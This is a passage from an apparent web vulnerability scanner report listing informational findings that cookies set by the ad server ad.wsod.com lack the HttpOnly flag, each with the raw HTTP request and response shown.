Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:41:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7161072?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:46:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

function wsod_tag() {
document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/409603?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:51:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 753

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/719556?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:57:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 766

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2609121?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:02:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2886387?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|8:61:46:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|8:61:46:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/MF-Static_Diversification 120x60.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
